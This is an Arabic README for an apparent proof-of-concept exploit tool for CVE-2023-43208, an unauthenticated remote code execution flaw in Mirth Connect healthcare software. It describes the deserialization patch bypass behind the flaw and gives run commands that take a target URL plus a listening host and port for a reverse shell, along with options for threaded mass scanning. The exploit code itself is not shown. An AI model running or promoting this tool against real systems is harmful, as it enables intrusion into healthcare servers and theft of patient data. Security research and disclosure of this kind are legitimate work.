
أداة استغلال PoC لثغرة CVE-2023-43208 - تنفيذ الأكواد عن بُعد (RCE) في Mirth Connect
يحتوي هذا المستودع على استغلال إثبات المفهوم (PoC) لثغرة أمنية حرجة في إصدارات NextGen Healthcare Mirth Connect السابقة للإصدار 4.4.1. تسمح هذه الثغرة، المُتتبَّعة باسم CVE-2023-43208، بتنفيذ أكواد عن بُعد (RCE) دون مصادقة على الأنظمة التي تشغّل الإصدارات المعرّضة للخطر.
فشل Mirth Connect، وهو محرك تكامل مفتوح المصدر في مجال الرعاية الصحية، في التعامل بشكل صحيح مع البيانات المُلغاة تسلسليًا، مما جعله عرضة لتنفيذ أوامر نظام تشغيل عشوائية عبر طلبات HTTP مصممة بعناية. تم اكتشاف الثغرة بعد تصحيح غير مكتمل لـ CVE-2023-37679، والذي عالجه فريق IHTeam في البداية. كشف بحث لاحق من Horizon3.ai عن طريقة لتجاوز قائمة الحظر المطبقة في التصحيح الأصلي، مما أدى إلى تحديد CVE-2023-43208. تم اختبار وحدة الاستغلال هذه بنجاح ضد إصدارات Mirth Connect 4.1.1 و4.3.0 و4.4.0.
إن كود إثبات المفهوم (PoC) والاستغلال المقدم هو لأغراض تعليمية وبحثية فقط. الاختبار غير المصرح به وسوء استخدام هذا الاستغلال ضد الأنظمة دون موافقة صريحة هو أمر غير قانوني وممنوع منعًا باتًا. لا يتحمل المؤلف أي مسؤولية عن أي سوء استخدام أو ضرر ناتج عن هذه الأداة.
باستخدامك لهذا الاستغلال، فإنك توافق على استخدامه بطريقة أخلاقية وقانونية. يجب إجراء الاختبار فقط على الأنظمة التي تم منح الإذن الصريح لها.
requestspwncat-csrichلاستخدام الاستغلال، استنسخ هذا المستودع وانتقل إلى دليل المشروع. يمكنك بعد ذلك تشغيل سكربت الاستغلال على النحو التالي:
pip install -r requirements.txt
python3 CVE-2023-43208.py -u <Target URL> -lh <Listening Host> -lp <Listening Port>
تتضمن الوسائط الاختيارية ما يلي:
-f/--file لتحديد ملف يحتوي على روابط الأهداف المستهدفة للفحص الدفعي.-o/--output لتحديد ملف إخراج لحفظ نتائج الفحص.-t/--threads لتعيين عدد الخيوط للفحص المتزامن.المساهمات وطلبات الميزات والاقتراحات مرحب بها! لا تتردد في فتح قضايا أو إرسال طلبات سحب.